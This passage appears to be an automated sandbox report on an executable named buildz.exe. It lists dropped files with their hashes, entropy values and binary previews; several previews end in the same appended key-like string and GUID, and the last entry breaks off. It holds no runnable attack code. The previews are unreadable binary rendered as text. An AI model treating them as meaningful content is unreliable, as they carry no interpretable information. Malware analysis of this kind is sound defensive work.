                        Preview:<?xml.............Ie.,....L'.....Im.'....%...A...?m.6...t.p......q.9l.6.C>1..../G.0.v..\...M.%..Z..yVx..Q1o$W.d_....J.c...]nB.C0...!.Z$.......\..u.4).I....R.L.}.U.I..?....l..p}.........~.....L.$..s".O.A7Q..Z...h..[.(...(..X'R.D...-.X.5.c.o.^..Dl.4..Hsn..|.Vlfy......<.t...]..W.....#.....j2.w.(d"Q8...._......-r....7.<...'.,_.q.........eX..[g.L.*9.D..7*....W..'F..E'Qu...F..>.QJ....Y..4k..=..X.....Q..H5....hK.u..R.\.ZG.......&..#;c69.}..?..6..l..Fh?<.7.H...6....gsF..6.z...l1.ZS.H..6.....[....\).d...U.fQ......].AI.....5z......#ez|9..v. .>..a....-...0...l.].p,...J.....0.6..g^.t ..o....{..h.I<..<..D.%rHesI........x.....X...#.vi..+.U....K....V{..G.i....I].`.s....U..=...N6E.tIdHT..G..i..dE....V.2*..1%....*Q....2m.3.V...jxd...R..{.%.$...mT...jl..B.1......J}..G....D]'.)...U.......i9.bTSO_...:...W...r{K.....0.....HUU....V.~....P:'(.N+.u=.cH..%.A..O...y.r.<.A.......W.._..=.B......\..HHZ.....,.......,.:.*"...N4..=w.-u.<......W<..g.......w.ca.x..u
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):937
                        Entropy (8bit):7.7357991686681755
                        Encrypted:false
                        SSDEEP:24:xOHs2EoBsRXo4c253m63CvNCU3Jc6neo3tGGbD:EncRXb2LnZvcUD
                        MD5:E256CDB21F8D761DF444FD11E40F5CB0
                        SHA1:5FF0F4D605959F3993FD6982728A26F65DADC514
                        SHA-256:129E2C1A83FC0BCC8F3BF0B89FF165B1EB84067D374CD62C431B5C6B8DA1F827
                        SHA-512:D3740C7B317E49F00AEB56AC47426C780BC9B293FD10376505CE6BE6426E2B276306DB3D6A540D73086DD280D244523ED3A46E6D13A580ED9609E909E6CED4D2
                        Malicious:false
                        Preview:<?xml|.\a.3..\..;.o.+.9.\D..y....+;p....z...>..\.E.=9...N..QYomjp.\......!.v..P.q.Zo6..M6vBT.M.(.fd..F..~...)kV.R=...l~.y....a... .@%C. ...w.lBA....".dqV..4.d.b..^h..kH.^...E.iP..M...~.-....m...a...._h..u.;U]..$.c...L,C.K&.fS.;..|.J.F..lf......5..s.c...-....&.-..<n.@...H|.".J..&.R(..+...7HbV..p?E.-y.&i...K2#.@.P... tv.....,D. 8..?..QY..k...M.~..s+#2..}..-..:.S..........Q.I...h..F...k... ..6..(.P..,.h5....F[..k..D.;...c......v.U8.e....k...K.I.(.+}.....9a...5.9.><.x..{.ZV..]..e...,U.2.AP...dL.!.=..6.W..M..c...)... .v,9../....e.2..46.2./_..]f.|.w. ..s>a.N...O.....n........@lE.x.c..iy.[._..,u?>XQR.pME=.....r.!..&..#...NO..........$...qZ...../t..6.$....1.!..<..'t.R.b>..H/^#g.>...)...2...W})?9........x. N..8...c]....c..|.?.|.,*...L..XQ..;s.j.W...jw/.$...R.lS6.L..H.X.I!.co...H...Q..q.=.6~L...,.x)...S.....$ ..o;..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):891
                        Entropy (8bit):7.702551628982445
                        Encrypted:false
                        SSDEEP:24:vHgSvmofDM2RvJyHLxpwWMUBtRzargm4jdCHGbD:rmcDrZSeWMYtRar34xsUD
                        MD5:FE848BF9C94E5E1BD6F4647F21F38B8A
                        SHA1:53ECC27DA5F3D12993ED5966EDDCAEDE1EF86509
                        SHA-256:EACAAF6870DED01EBA5A56B307EE8EE76483387BA9ACFABFA03AA164DE70E9F0
                        SHA-512:01B6A0F83E7ACAFF18B746B88A2F70461594B149A3640B61386C0C19B7D67B33E9461B45A79F6D20A62C0FF9F4AD085638763464EF5BE45E3E5C77ABBF9583AF
                        Malicious:false
                        Preview:<?xml..x.rv..I..?Y..i#.2,.......3.?pG..M..3....6.\_.3.....t........-..D.+}7._;..To..!qM{9.,n.5(xb&....Q.L..ZnX.OLd.~.=.m..*.xf./5.Q..q...t...m..3...9..$i..........4pU.>.....Vj.1.RqQa....sk....:.|.....v.5.R.%m.....S..bLpG.s.&......y...m..@.......{c.....E..77...F.r.._..?.W...!_@......2.U<.........~..)PA....N9..@....t......%.....V..........A/4|.<..c.;.+.G...Sb....k.W..`.z8..j...b..A.Pq9..X..`.p...'.]J5...I.`..[..rf.......2...oW......C..._...%./.......&#......5BS.o.x..P...z]..;.U.....b.._.S.........p.kH.z..L...!.?..Fn....My.7KD..By.$..B.....a.A..K[../......}....>.I.9.....<......A<..h.9.,.-gG...2H..7.q.W..}..z..QW....e..J..b.-.)k..K.Z....xj...C........jM.....)i....Zz[.S6).S...\Q7..../....2.pU\.W..?.&.9...\2.Qh.,..&..=`....<E!pf....C.D.$>.EI......y..U1|d.=.~cA.&'.>EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1049
                        Entropy (8bit):7.804430390300171
                        Encrypted:false
                        SSDEEP:24:q4of0EiJOxcavCL4rvWX9wn43sVHN41F+r/wrxgWqBiaJNvWG2MGbD:q4O0TOmnLsWtw43QtAS4rxgdfbUD
                        MD5:D14E4C4DFC5D195B2DB1E6DA8BB1B559
                        SHA1:1AB60380B6016EEF444623EEEDA4B599198ACFCD
                        SHA-256:A9F12F6B033E683F0B0E756E381389182B874F460A03A1B6C26CB5CBAAB25875
                        SHA-512:D1F28290E871336179A2FDF2C353AFCAA3E59C06054F552BFB1759333A2A1CD3481C6B7CC1DDE3D895E9EBDDB8ED8E26D817D6C63FA1D1D9A5BAA5C3E36F7699
                        Malicious:false
                        Preview:<?xml...Kme..!..6..q..(I..%%e....tm...d{-...<..\.`.31.R...8G...&cPG...I!C.2......e.n..l,..@l.9.BGP*......|..J$a.]....c..5...Sk..$<..0..=...:..1.6.|.(.8....q...........$..P.....W.a.POM../....[..,.S i..'...$\.....D}0/.....O.?s=..H....\.'.RYR5..:.y....]...........C...g ...-.....h-.c_.u.5...JgUR?..mB<..h.{.U.......k.fL....g....a.,..P.......y..I.....W..........Z...P.`.8xgIM.j..M....E8..p$.j....r....".4..Y.E.S....n.....|..90......f...V:.f..UM.....V.K...A.S(QX7.4.cuW:..L..xF...hj..V..$..........,.....-.#.~....jpp.,Ql.P/..I..9`.qxy..A.* $.%..K..^..KFd..a.C..8.s..Q.....5.#.....du..=.&DX...xR..;.;...?.......k........sA..mw.l.7c|9j".n.Z^.....b.iG.I.N....v]',v....c.^*&3.2-&.8r....OD....tCY..O+3...).Z,.).[.c..(..*.u.Z{.J....9G%1{.e..,...U...}.{m>....Z...EG.7,k\..8..N..5.FK.....Y/m.q..\.).....21.T0.<..^@8...o...q....CU.2w;r..H%........c..i....oA."..D.=[..a...,.....6.+.w...v.-5.%..\1x."qr.. ...'..H.Gb%.......[....EdRvSqD59xL4qFRlN46qLGl69IpLP
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):885
                        Entropy (8bit):7.7527929444637405
                        Encrypted:false
                        SSDEEP:24:tshNR+xm9k+/q8yKrmsNOkDLHmfgzhE1ZAGbD:SsxmO+/f5rHNOkXHFzhE1mUD
                        MD5:FC783BFB848454189F9FB30ABF9C1F20
                        SHA1:DED2C1D06F078F1C0308DAD072758C3F24C85B5B
                        SHA-256:BB0A123553C8532AF7620ADBCAC6A0C1FDA909013E9202D43E6C461F4D852ED1
                        SHA-512:629D6E33959F15613AF745F1984E87364D7BA132090C014F80E97D06077C092531B3E3EC48A96E8CD7A5DF892426AAFE2E8FC58459FAB32991F1BFD5E4EE7194
                        Malicious:false
                        Preview:<?xmll..(/t.f.x.|...s..lY.G'..K...D..pp..-.Ga3....B\D...C....,....[.6..y....#>..k..m.w.8...v...P.b.c.}..K....\.T<x./.....d..B-.q.....y{L;s.*.......n.}.....I..9,....+n...!X...@...Ur..Z...;.JB.v.j.\..AYBL.x......_..e.y..,9...rp]N.......~......G.......).-..p../$..2.Kh....I..:..o.....M..3.....l.y.......a82k..>Iv..G...I.....O2},..s.sAW/s.U.......c6.4'....j...D.Uq.C$.S.w.7.K.......p.....w..,..O..4R...=~~...=....-K.E.........T._.8.y.T.....w..A..oG..I.'=yzG#.gs.6dI..3.1.U..cK^)y.W...T... l~.^...%K.@..6?.5>UU$.u.....?...IQ.(..V..OQx^!f...g.y.kJ..R:....n..ZWR..)...&.!>`.Uf.....30v$V..4Cy3.}...........{.0}.w....2.y...F.)......A.X...n..:.d....f........l.-.!........./"..........|.)6_L'......:..8A.@E.....s.............d.Q.8..1g.....2*.`...G:..*%7......ArW.b....../.X!20...M.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8529
                        Entropy (8bit):7.980469515483093
                        Encrypted:false
                        SSDEEP:192:XIzyFWXEAuUg2wTOOScDU1zVqqcuptjJvK9LmCA:4zyFmF3wTacDCYupt1sA
                        MD5:8D7797DADFD9C285FA04D9EF0B1105C7
                        SHA1:E4C37FCA46E5494F55F25338C9621D3CB2071356
                        SHA-256:2B7E49FC56DF964166159DF606E678C01A15084C1F7A0D13D8DAE21D0A6E9CB1
                        SHA-512:2A942755161984BC2C451B25CB692F90551B7022DAC6EC2CE7EC839E6E55B732DE46FD5C3751AA2D350DAF4DE2966B03E85C91573BA5DBDAB9EF8FE71FE623E0
                        Malicious:false
                        Preview:<?xml...b...A.B...|.].....;D4...y...7I` .s.}...t..`...b8.us^..s.f..^.Y....t..j..mCJ..1....g}D..%^..@.k.r..I..KM.q....^@..R...+8..^.q.u...oa.9.J.j......`.......Pa!.a.:.....B,......03>Q...<..K.....nlE.p1..Y4.}...'@.|.4.f....K<....}.SyF:9..ub.V..AL:].....Sg.y....k.%@......O...].'D(..\;.dx.t...........|..8w...cz.....%nLl...).....@(....H....J.?~.[..hv..7.R;.r...=..@#}J....Ku.m...;.).......].`..@.m..6.........3.w..i..&-AI.J.....F$#7I..Gk....->A..]..-t....k.6.2.....pA).,....b...9....~;J.F..I....t...9..k..5v#....$4./.s......M.ju%.6.sF;.e|.3..7......P?.h....6.D.e.XR.@0..0-.@.S..?T....6.O......<..._...+..%(.?B..".Y..)....n..\...o.........s.8qg7)....-`.C....h#...y..y...c....8...3g`..C`.U..k.../......~f#"......9/r.y...r../'...i ..:..U..........)d^.9......b...?....$Y/..(....(}4F.I.D.a.E.8..!...^.........A.{..JfH..|9..9h...;..iY.l.P.....|.......^I...|.PB..Y.....i..T.e.....2..NKb<kb.Ih....A..P.AZ..=.:.c..*.a."ti.6.`.%...z.f..GuS..?..){9p....0B..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1242
                        Entropy (8bit):7.817871614773857
                        Encrypted:false
                        SSDEEP:24:PfpugwDNBHoZ3Gn4FbXMzqC7kDU5dDWOU6GeKpo9G94ZZlJnzNSgr3IGbD:HpPkzu7pXMzqpDU5uOfZLEGYUD
                        MD5:A6E475C64A55CB1828E1E2327756F6D9
                        SHA1:5F564B4993471A72E4A23C277B5628341AA3C3C8
                        SHA-256:7EB6F03E9854F903884C354FF2D70AD3B40C016CD22BBF0F2A6E2B1CE6C3FAA2
                        SHA-512:A1F00FB720031E0DE52B007E3059C0729B5B05D51AC0407E28DB951049D8CFE1BF4F69674C0260FDA4C9E9F3EB65A0603F93F20A297BE35BE1817F0A13184865
                        Malicious:false
                        Preview:<?xml.{.....}iq..'........W.E.M.@+}.Y(.\~q.".....K..+.f7d.{..Jn\[D.#,...."...z..e...n.f.h....yJD.`.....?1.MJ....p..t.V.....r.E...]$.... ....d..?.rTe.G.v..k....Z....M".%J%..b.S...."7b......0:.Xw...tZ.......q...5..u.<.P[5.Q...'..&.....;~...#...c\B.&.3m....R0..z..m.D......S&^....u~D.p..._..0^y.n..).....!..@.,........O:.J@..~...\....J...........#.=8...60!...T.o.@..F..&....%t.3.$...Ym~prd'X........ \....T...c.9...!...En....Z..\.?\.....+q;.jN.4:0#3....2..cS.2Y.|ju...d. ..TH.!/....2s.n.\...C..R.p...n3..gx7.<.7......+M....2.c.^..N............).,....Ip0$%7K.L.7.M.....b:.k.'.F......c/.|..1...N1Ixt....B..o.....u.u..=..hD~....ew.4....!..?.^SEz$e.z(...n.G.r..>.....o.{...........Y..M2..R.!.|..#.gc..u..F..8....4+I<..I.9.y.8.I...........&.n.+*Q.N]h4....!...h.8.daGQ.%.}.....uv(0.j..&.C.9....aTTA.f....jk.=.W..;.6a......I....X.R..Q+],..!..4.S..!nR#'...2.....6..} Xj..c_.....I.....zPK..W....&..cv$.`...c,.1|...m......C..D.7@.Y..`.6l2@..92.b\......... ..C...I......
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1185
                        Entropy (8bit):7.785450690592991
                        Encrypted:false
                        SSDEEP:24:rVMYcn/h8+gKW3SIurM4oLSJ5qC614LmDAMKFHDJracNHGbD:tcn/9W3SIillcaxHDBRHUD
                        MD5:D169FD46FD65DD02C67404679EB28ED6
                        SHA1:23DC6F9B4A14C2C828B26EEF392ED64682614643
                        SHA-256:21C5CC1D67C2162E66AEF747AED02E94242DB8E1A08DA40B8B43C84E1FE8AB86
                        SHA-512:04AD4F9C3429B6BC3C04F1E172667C0C130232D9EA7819755D79E14427FCB464E816042BE04A13AE2513523FF55237FF5C37385613FBCCB11E7B8FC595F041DD
                        Malicious:false
                        Preview:<?xml0%.&.....5.dRC...2.{..6..R.E.@g8v.$..-...h.;..Dk...N...v.4.u.P.h.y."....~........Pz{\F...U.....(...d..2.7J....I.3.#......2....A0...6..A..{....../.'&..z|.DMc.J.&S..<.O.Hb.I/....9j&....]....(.F..M.3.E.......=.pa..os.Z...7....m....wU...$..VE..a7``E.l.KCK.e.I7..{....M...o`...%|.........B....A.......X.E.;g......7....%.....ET|..+.e...C.C.7r.......j..g.H...c...J$b.e...!.,.%l....{..g..xE.WXGwra..$.9..H...W+....gF.:C......$.=\.=.8...s.w..6y....S..NC.&.....E..).G].....,-b.qX.8....x.P`../3...5...C4....O/...D.o.......a.nP6..a.R.n.w.. .v".0.`So..mnhg......P...j../>....j1..t2$.)./.N'[0.(x.9.r...u.S...S|er..V.....#.V:....V-.......*`.../......F..........t...L...*.>?....*.n7rM.....0h..-S.O{x...H..(..SmV:..V=78...$.y;.Ej..1>|T.Y.8........)]+Eu...B.^.../.j.....(.u0..&.?.<...;.|e..t\.i>r~...I.m'J.7.....8}..P........h|..Uy.........LY.aslc..Sq.^........%.`]S.Kast..Z...4..VNv.9r......./........,...h..I%.h...!.nD~.....:s.1D6.W.2.0......R+v...4..........Ium..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1073
                        Entropy (8bit):7.807035041398727
                        Encrypted:false
                        SSDEEP:24:jFliMY708IKi3SX+yywJWe5y8jGWQHRuA92+BSg8HGHywGbD:g708hGwJWes89QHRe+AHSRUD
                        MD5:434D9AFF95CA32E5561332CE013C131A
                        SHA1:95D3980567174DD25C8C2DE40628ED0FA73088F5
                        SHA-256:667EBB978888C8034D9882CAD86C20AA307F53B19ACF3B8A90109DC54362C63A
                        SHA-512:BC3AD48960BF9131F4FA238ABBE8D74E0C6D836D7CCD0822B7B7EC012247581AB010AD09E06575ADAC778FE81EEBDE834BB34525F5D97250FAA59E3A42D0AD6F
                        Malicious:false
                        Preview:<?xmljO"<"....p!A.j..#yW.B.7...[...0.......Hw.3/{U]<>....;.......I.[.h....j.[.^jZ..Z6W......0....~Dq..M-(e....?.:...........>....1........)p.P.......64.Z.".~../.Vl.<..ho.....c..D.....<..w./......h.L...>.}...h.5...A.k..)..X.n...f.....^z2v\.{[`.c+..Q.Q..aN...=x......(.C...v3^ D#7.:o..c..NN.MUAI Hp.Q.Dt,h.U..Y.....}.....c.C...I.3.9...z5.........f....F'DJV.../.q;.4...R.J.?u..\..&O....D..O45.!.r*.?..............\-........#..l.4.xM[>.2..]..'....m..v.U...BJ.^3.Yr.^....pv....x.....1ZX.....w...K.nQ..#$.v{.%H..Q.s.`.H......dA.CD....[GB).K..vx...).._.....v..O..:.1).@.X.{|..]...K.._R.N..7F.Szh|.7# ....[o.A.9s....d..."..,..[....1v<X....[5}....A..b..|RI.v9b.{VL.P..."U.a.%.r..b4....Z....Y...n&.?.*".|.5;....Fy.8.yn.."y(......Jf..\...4#%.'....tT.*w.X.....(..g.......q..(.P-A.7......_.xv.....ss..<..T1.....h.w..p.......[JX...m.....r.!.-.1.8l....o.^(,aq.."..c_n,...N.8Q.....|sC4Y..0..&.....e....r.`*o.jn.pj....c=.l..~....w.x.IJ/..85.&Li&e...g.q=n..k.EdRvS
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3232
                        Entropy (8bit):7.940650243935766
                        Encrypted:false
                        SSDEEP:48:YhNhE7TDkyNE4RHqSXjMn0Ehq9EPjxuEq8QcayQlr+SZxVWHGpefk6YdH+PNuQNW:FnPEiPXIBhYB3YGpAk6+eVzNBA
                        MD5:F3FF135EC9F38CDC23E896DEA8C307B0
                        SHA1:C082A77C72D8A5367FAB15CD2F97028753A67B88
                        SHA-256:5EECD228395139BE5DAD2A5833A657E7589DA3456E1966A115AFCB731D755163
                        SHA-512:79A2067A8D6A9407BCF9A469E754A492B0C89338110F208C3AD18BF1C9EF87FBB22B3DDC10E92677E0377D7A5E31F0F53A71E6673A15613796843C62621298C6
                        Malicious:false
                        Preview:<?xml..T....#.z...Lm...hb..`4.........]...Rnh...............$...w|6.........h.JC..Fq0#...xL..Q.v....PV{..\P!.}....RL.zO...............E.B....;c.%=...,...*..._...M}...3..:S.....p.....O./j .Q..2I."mrO..G.....O..:...a..N.......o..,..tnG..:P&q....`.%I....z.....9..n..`...l.&6.).'0.w2.GG~.!.' ...AN...1@..\[J^@.v.n.....Gz.X..,..>6.....;n.....~.\l....e........U.9^N'...).4m_.)..d.L.m.........I..f..0!..9T...o]Yz.%#.......E.*n(..!.W.n..'.L1.9q.[H..lQ.U..X.G..m.y...xkS.f.4U..nd..\....=U..a$a9...exv......}..g.aK....Vqza.b`..........Rk...G..4E.S"C...l...b.g......Xf.3-,.jq..../;..R.7/..C.e...l.t]....`:..*w.d..TB.Q6.+...4..~.....-y...;...:...o..b.X.../..T..(.`sA...;..(......f.".M...W..+R....t...FN..'..4.d|%.;j.a._T...0.$.....hN..2]C!D.H..X/....|.....H.....i.S..../.H...To.{kL.J.....\........3.....+..+.....h...H.D.5..."..H....r.....&j..%..J?JD.<.P..>B...a.1.]...v..A...?..lF%j&....(.S.2.e..a.{n...&.X03.GL.o.J. W.t..V.zH...d..+S..l.H..n.....a...n.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1231
                        Entropy (8bit):7.849262858141236
                        Encrypted:false
                        SSDEEP:24:EDoL8M5RrNl2tHeqBfyfdjiWcO4Im8lrMKFKLSctQlrqqFGbD:EDo5m+7iY4Z8RFK+ctQlmqFUD
                        MD5:9BF0E30E0692E40C30FBE5B2F39378A7
                        SHA1:4F4CDC2EB5777BD8580C130662E6C227775AFE3C
                        SHA-256:11B158F28C7D3F85EC4344C5F8D1C02EFE0AA4FE103BD043C29D6BB57A27963F
                        SHA-512:8CB06D8C68AECA0649C65BADD31438809EDBEB643A80EDD9D422F4F3126FDFF3A4A2FFC7BB835B43542C56E716C51C765D7E0542A3F2327DC0471CE53ACA5E42
                        Malicious:false
                        Preview:<?xmli..'K.....T.i..&.t../.[....A...g.c...2m.I.f..ib.>..V%.<. .X...h7.....7<b....._..Z.z.A].u....(.V.nt.+...^.;qD.6......$.....z.Z.jx.xvL\...g.~........k....p..Q.T..5.......zl.XR.|N+S`..b%.e.P.lA[...~....r.(.v....Py.....c.Uh...m..f.....6.3.\bG.....F....{...b.e.a6...0.3kjV.4y).j...Vh..Z\...N7..@_.....4.....l..G..d .f#..^...AB.....#...c..2`.NF...).[$...5.t...(.=n...".....P.....^.x..W......k.:d..z...3.xK..|...*@$tK...k..:..:..]..J........g..s.S..4.H...Y.(^.OU..#Xk.G.~6...]....L.C.7..Uo..I=5....Kc..^R.....o.._..k....r.gr.(qy!x.8P..N.(..Z...K.4.E..s@....i.4<}*.9zt............M.......*w.x{...w...2....J.%.....&j..:.....2.,^...~........%Q,.V(.<....."H."....g.1...$.....V...hJ<...........).Z..L4..o........TZ...83.w.....].*X....6.X....O+.[.I....R..3...t..|Y.2l. .o...H.q.a..1=*...|zX...|.@....?j.<.x.XoM..kcv.c......"...q.f....wc.....N...'....lf...$.+>...e.8V.D.>(X?TJO.&...Q.'0.....&...;..v.Oa.e..8<1pp..R.."...Qx.,;.:I..(*..Y.....6.<).7..Z.k#V.2.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):7567
                        Entropy (8bit):7.972098259363272
                        Encrypted:false
                        SSDEEP:192:C+j9eKxo6xxSsVr3bODDPMOnKS6qOHOPwKcyS0A:5rxxldLODDPXhKRK5A
                        MD5:8BE8999A28147693A185A3B1040E353B
                        SHA1:71A2CF163D004DDAC1637071E46C1AED5519A819
                        SHA-256:439A02BCFF464AADCC13EAAC801E20E303757B4B0EEDA4DE2B9C679B014B2C3D
                        SHA-512:BE26F9361D585658AB89344540941E76F82993C44766AF18C8E740AAC5E7617D23F6300DAE4AD694FC484D2A0507AB79E4056982C0EA530373D0D47D880B1269
                        Malicious:false
                        Preview:<?xml...`....N..3.....o.q-..{....5.....|...<.Xm+.u:~/M.!...4.Nx.yTk.V...v.;`..............}.S;P..v.?CVy$...........y.Y...:....-...5..T.B.%..`@....Y....B......hO%x.3nag.....>.(.?+H..8.A..N.....1n;.r-,J...a.Ku....a.A....(..d.....%.Ee.u.^+@^\. e...Mm....k.s.2.(...Q..NfF.aJ]..$`.)...~.!....|.%...........;....S.N...&+..rqY....R./ZNJ.f.#........./+.....F....CEh.<5V4.......#....n....j.O.i.h...k.T.q.sK.T.4..G}.-D...Z.....9..+p..>....X.8...uY..RZ7..;.V .gZV}?.<.h....{....nC.$].+..z.V.c...b..&.0..i!..H...u...mp...E..8k.#.....e..I.Y.1x..d.%.}.]j......D.j.L[l.....L.'......r7..4...z....L...|..Pr.J.J.>.......8g..f.z.....JJ+......G.j4fe.7s> Q....C).|.q..........|.(......=QP."&...][.j.......Q..8...RY./p.c....q..d...(j.b/a.R5..\..<...:./.]..e.~"O...X%..b..3,......2;..`k.x.....#.]i.......R....z.....2yBuA.....J.....+.).].A.f.HP..:D....%..5 ul.s.@f.I...d..[.._......5w..>..5...HaX<v..%..Zs. )F.....{e$..hY..nhQ..E(.hN..dK...(...:..tF.1.&.J..P...{!.m.F...I.i..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):816
                        Entropy (8bit):7.706687030848027
                        Encrypted:false
                        SSDEEP:12:TmH1dzAluUjdo2jm782E7FaOLl/QPL7N1H9L5cJ3UeY+2aJ26Gcii9a:TaA4kO2jRNkwgz/q/2aVGbD
                        MD5:E10F8257B5C09EB5C7331F12166381B2
                        SHA1:BCFC6AB6133F081C927FDC856CC2C82A1F1B1A0F
                        SHA-256:39C63F3E6C1AF4C31969947426929EB82F94EB0AF1E5A7E27F61921F45F31748
                        SHA-512:9D2850AF110563B58C2ECB857761C76F015CB403E432F35AA18BD6118DF44683F9F3FCC64443315B7A814C8BA04E5F3D5613AA14084D92582EE84BFD3F3A2AE9
                        Malicious:false
                        Preview:<?xml..Q;..}..x...:P.=/N.....9......).VWgt".@O.m.q.)..t....{.......1....`..1..1..9j.6..}.>.....TR_l....a......O..O.M..\d..TE...u.......*........?K....a..D.,..\.@\.RS....Y.A..|B...r......}.$.m.....rNW...u..Q!V..~.4q.'(.Tam`h.y.v......(I.O<...x....Cr.....\R.i.........?.)53H@~&j..,.<.Z..%.....T].R.b.\....:...51.....<.v.tY....FZ..*..yRL~P..%-...ih(..IN.J...3.......e......_...qK.u...i..T........Z.S..1..F.W........Y..g(...b....R......4.C@...j..P...).....h..RA.@..~..^..lZ..>..c.....9.6.^WN...r....X....$.M......9...OM.MVOC!.0 ~......~........o."..j..a......"...im........#a..].'.l.....!.mJ....D.'c.J.g8...l....L...l...RE....H......).....5.+T.C.....*.u .b.].]waud.....j(.@..\..t...........g.&.4?....EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2272
                        Entropy (8bit):7.916868647859692
                        Encrypted:false
                        SSDEEP:48:x65diY2ifwr48s+o51mZgFWyI9qzLV3YgdSMlEhcps271VUD:SDE0mZVyI9SKgdV7s27bA
                        MD5:254EA76D147D60AF9BF76529E21FA1B6
                        SHA1:963460E104A00A54A6ADA4F3B4A77712E024BD7D
                        SHA-256:3E39A594FCE86CC3F2DDC4971252836CF5025108B03A1C83B6A2518EB12C25A2
                        SHA-512:7EAE24BA49FD8BBCFFB960CD553D09EAD3378E5179B77BC7D830EFD25FB7EA0F00EC2FF4B6C3D8DEA79C0CCE3FF6ABC455EC69F53967D9853E0CEE59212FC66F
                        Malicious:false
                        Preview:<?xmlD.sK......X....z...{v....p3...|$M.....F.w/.Bh..=..U.............lx.....s..D..[. .1.z2~....-8d.2.%.&.;..b..;>...9y.q...$?J.......o....).......[~C.|.<N.f..8o..5.,........[...n&.u.XM.S(!e.w.z....<T+.2.,...%.5e.gHy..q;Q....y..H. 6..d"T.E.T......O.)........s...}.d...0.y...9.jf....P.E.....;.4...K....8.;2..]?'.M..6.:n.`'..v.|..o...c..y.........]....2..C.....=..:k.m.....X..3u...:.....X..X>.:..{.:.......+.s.B(L.@<.s\.z....`....W...N....FK9....g.M#-...+.U 0,b.p.mr...V..0.MG.F...Y..`...H....K....+.W..|.V....JXU`Ag~.?...T...=.v~IPy....w..?=.7.........D..{.... @"R.5.r..%.i.x.1.>.!.]....@r.'.b...&_..SrE.............i/......OZ)P...V..}2Ih_..?.G..e..z..j.O.)!.=.$L.x.-#*.....e..]?O+^..... w..^...\...q.:..YO..'A_...$Y.~#.$..,.P...~qw[.....Mf.o%W.3.).v...-...'W'.v..-.K.7.\..D=gC]..;.xNISD...'..t.1........v..P.'F..g.q..V.-c.....2...b..-s........./!.8.....G..~..].z;....2..Q.ag<...AN.............x..>D.&E^d...px':.iW.[.&..@..U.v.a.............E.. ..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1311
                        Entropy (8bit):7.847495271613315
                        Encrypted:false
                        SSDEEP:24:bA2M4xFTM0DN5HKva1RI1xPryfe8+j+Kb8jABTwqd/zkEWhv6HGbD:m4VDPqy1q1xPG28+CA8+THbkLvEUD
                        MD5:24CE27A268266782DD95D31D6A3F91BB
                        SHA1:7619C2EED9EDD225394DE36B2A1EAD757EBFBB1C
                        SHA-256:AB031AD59479F6B35FC92DF768A7CF40EA268D782A96AD1209B1924B674EA923
                        SHA-512:8DEB942B98FAFFB7F7F2C18577C33C9A2B5ED0D00010D65601BA6391A763AE07FC16910CCD9F249C537F1AD6C75132079524A70E3B7D32FC2491AFCD19536026
                        Malicious:false
                        Preview:<?xmla...tTY..][.*...XAWN|.Y.`...@.?Ds.;...?.c@/.(...@..~....>..M.P.c..../C..M.%...c......j..9.P...7.c...,JR.c...;l.t=q.-%..v.vI.M^D...Ic3...V...S.a.La..b....D.&.7.x.....oWGN@h@.j..(...j.f..nR1....'...M..n'.*..b.U..a}s.F.R...._...J..j.4....sGS....u.tI....KB).lW...t.b...Kf8....L...`....BQ....$.l+..q.Q.T.z..D.s?..'C.?i...........#......I.^....?4....iY..^>...>.R1y*6%..%.!....)...F..n...P..M..5.s{o.3V.!...8...{..+|q.p.{E...4n...i.k.Y.+..u..H...9.+...@.Fm.#Q7/..........M.o.d..e....Z.O..nQ..K....:.D....1Q...Ut..(!.K7.;3.Ur..}.h..9P..Tr....;..].b*.B....I..7d.6....b.)....as.s.$er`p..q:.zw...!'.....em.A.....J!].....^C.$.4O..2F......~....2....T........We~...._..pv..Mk.X..T....^.-b..2^."=a..X.Z....&ej.g...b...1.b.t......._...T..)..X.>.S-Nw....%.....L..v[.XfH.=..'.u..g(...B.:..Zg..#...qCiB..X..t...N..$Y.L5.ya.........c....O..7.b.t=E..|...2..Y..............6..-..e.Lyx.F.K..A.I...V.P.Qv'bY...~).M.x.2L......)...F~......H..E!...c.V@...o.u....|Ad....j$l...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3172
                        Entropy (8bit):7.936570050482805
                        Encrypted:false
                        SSDEEP:48:mIBKi+ZMrwVVHKGIPN6Y7sAkMnBxXbyXHZXKsmVAQhwrqCwZPU6Jl24j2Kai2pOY:iSOq5WUBaasRSwidU8hyKJsCq3RQA
                        MD5:157DF25420FF4A237B936485DB117984
                        SHA1:1431BA684510DA6A53D3D3C0A941E024ABEB99A5
                        SHA-256:C8EB80A5B7B3A5F935F0FAF71CF302761A5D30FD19A4B6A55A9D02A0D52947C6
